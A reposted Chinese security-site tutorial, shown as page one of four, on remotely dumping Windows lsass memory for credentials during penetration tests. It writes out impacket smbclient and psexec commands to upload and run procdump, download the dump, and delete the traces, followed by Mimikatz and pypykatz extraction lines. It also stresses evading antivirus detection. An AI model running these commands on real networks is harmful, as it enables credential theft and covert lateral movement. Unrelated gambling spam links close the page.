歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

通過lsass遠程提取憑據

來源:本站整理 作者:佚名 時間:2020-01-28 TAG: 我要投稿


在企業滲透測試中,橫向移動感染和權限提升是測試攻擊范圍和擴大攻擊力的兩個必選項。有多種方法可以實現其中一種,但是今天我們將介紹一種遠程讀取lsass轉儲內容的新技術,這將極大地減少在一組計算機上提取密碼時的延遲和檢測。
lsass.exe是一個系統重要進程,用于微軟Windows系統的安全機制。它用于本地安全和登陸策略。如果結束該進程,會出現不可知的錯誤。注意:lsass.exe也有可能是Windang.worm、irc.ratsou.b、Webus.B、MyDoom.L、Randex.AR、Nimos.worm等病毒創建的,病毒通過軟盤、群發郵件和P2P文件共享進行傳播。
CrackMapExec
CrackMapExec(CME)是一款后滲透利用工具,可幫助自動化大型活動目錄(AD)網絡安全評估任務。該工具利用AD內置功能/協議達成其功能,并規避大多數終端防護/IDS/IPS解決方案。
CrackMapExec工具由Byt3bl33d3r開發和維護的,其目的是異步地能夠在一組計算機上執行操作。該工具允許你使用域或本地帳戶以及密碼或LM-NT哈希在遠程計算機上進行身份驗證。
CrackMapExec是采用模塊化方式開發的,可以創建該工具在登錄到計算機時將執行的自己的模塊。模塊已經很多了,例如枚舉不同的信息(DNS,Chrome憑據,已安裝的防病毒軟件)模塊,BloodHound構建器的執行或在“組策略首選項”中查找憑據的模塊。BloodHound是一個獨立的Javascript Web應用程序,基于Linkurious構建,使用Electron編譯,其中Neo4j數據庫由PowerShell ingestor提供。
Mimikatz模塊
特別是有一個模塊,它在一段時間內非常有效,那就是Mimikatz模塊。CrackMapExec在遠程計算機上運行Mimikatz,以從lsass內存或本地安全權限子系統提取憑據。lsass包含所有安全服務提供者或SSP,它們是管理不同類型身份驗證的數據包。出于實際原因,用戶輸入的憑據通常保存在這些SSP中,這樣用戶就不必在幾秒或幾分鐘后再次輸入它們。
這就是為什么Mimikatz提取位于這些不同ssp中的信息,就是因為試圖找到一些身份驗證機密,并將它們顯示給攻擊者。因此,如果一個權限帳戶連接到其中一臺受感染的主機,則Mimikatz模塊允許你快速提取它的憑證,從而利用這個帳戶的權限來攻擊更多的目標。
但是今天,大多數殺毒軟件已經可以檢測到Mimikatz的存在或執行,并阻止它,所以CrackMapExec模塊只是掛起,等待來自服務器的響應,但由于進程被殺死而無法獲取。
手動方式:Procdump
因此,我過去常常使用名為Procdump的工具手動完成此任務。
Procdump是Sysinternals套件中的一個工具,由Marc Russinovich編寫,旨在幫助系統管理員。目前,這個工具集已經被大量的管理員和開發人員采用,所以微軟在2006年決定購買它,并且這些可執行文件現在已經由微軟簽署,因此Windows認為它們是合法的。
procdump工具就是這些工具中的一種,它的任務是轉儲正在運行的進程內存。它會附加到進程,讀取其內存并將其寫入文件。
procdump --accepteula -ma  processus_dump.dmp
如前所述,Mimikatz在lsass內存中尋找憑證。因此,可以將lsass內存轉儲到主機上,在本地下載其轉儲,并使用Mimikatz提取憑據。
Procdump可用于轉儲lsass,因為它被認為是合法的,因此不會被視為惡意軟件。
例如,使用套件impacket中的smbclient.py將procdump發送到服務器。

smbclient.py ADSEC.LOCAL/[email protected]
# use C$
# cd Windows
# cd Temp
# put procdump.exe
上傳后,需要執行procdump來創建此lsass轉儲。

psexec.py adsec.local/[email protected] "C:\\Windows\\Temp\\procdump.exe -accepteula -ma lsass C:\\Windows\\Temp\\lsass.dmp"
然后,需要將轉儲文件下載到攻擊者的主機上,并刪除遠程主機上的跟蹤記錄。

# get lsass.dmp
# del procdump.exe
# del lsass.dmp
可以使用Mimikatz檢索憑證:第一行加載內存轉儲,第二行檢索秘密。

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords
該技術非常實用,因為它不會產生太多噪音,并且僅在目標主機上使用合法的可執行文件。
限制與改進
這種方法有不同的局限性,我們將在此處概述它們,并提出改進措施以解決這些問題。
Linux / Windows
第一個問題是,在測試期間,無論是用于Web測試還是用于內部測試,我主要使用Linux,而Mimikatz是專門為Windows開發的工具,最好能夠在Linux計算機上執行上述攻擊鏈。
幸運的是,Skelsec的Pypykatz項目可以幫助我們解決此問題。Skelsec在純python中開發了Mimikatz的部分實現,這意味著跨平臺。像Mimikatz一樣,這個工具讓我們能夠提取lsass轉儲的秘密。

pypykatz lsa minidump lsass.dmp
由于有了這個項目,現在可以在Linux計算機上執行所有操作。上一節中介紹的所有步驟均適用,并且將lsass dump下載到攻擊者的主機后,pypykatz用于從此轉儲中提取用戶名和密碼或NT哈希。

[1] [2] [3] [4]  下一頁

【聲明】:黑吧安全網(http://www.650547.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        安徽快3自由的百科 福利彩票3d谜语今日 在线配资平台识推荐卓信宝 pk10为什么一下大就输 广西快三玩法中奖规则 湖北11选五开奖结果 中国股票指数期货交易 云南11选五任选走势 辽宁快乐12选5走势图下载 腾讯分分彩分析 山东体彩十一选五走势图